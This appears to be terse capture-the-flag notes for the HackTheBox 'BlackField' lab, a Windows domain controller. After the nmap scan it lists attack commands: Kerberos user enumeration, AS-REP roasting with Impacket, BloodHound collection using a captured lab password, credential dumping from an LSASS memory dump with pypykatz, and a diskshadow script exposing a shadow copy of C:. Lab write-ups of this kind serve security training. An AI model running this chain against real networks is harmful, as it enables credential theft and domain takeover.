HackTheBox-BlackField

NMAP

PORT      STATE SERVICE       VERSION
53/tcp open domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-01 02:43:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
49676/tcp open msrpc Microsoft Windows RPC
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

PORT 139/445 (SMB)

Foothold

/opt/kerbrute/kerbrute_linux_amd64 userenum -d BLACKFIELD.local users.txt --dc 10.10.10.192
python3 /opt/impacket/examples/GetNPUsers.py -no-pass -dc-ip 10.10.10.192 -usersfile users.txt BLACKFIELD/abc
python3 /opt/Python-Bloodhound/bloodhound.py -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -c all -ns 10.10.10.192

Privilege Escalation (Audit2020)

Privilege Escalation (svc_backup)

/usr/local/bin/pypykatz lsa minidump lsass.DMP

Privilege Escalation (Administrator)

set context persistent nowriters
set metadata C:\temp\metdata.cab
set verbose on
add volume C: alias uwu
create
expose %uwu% f:
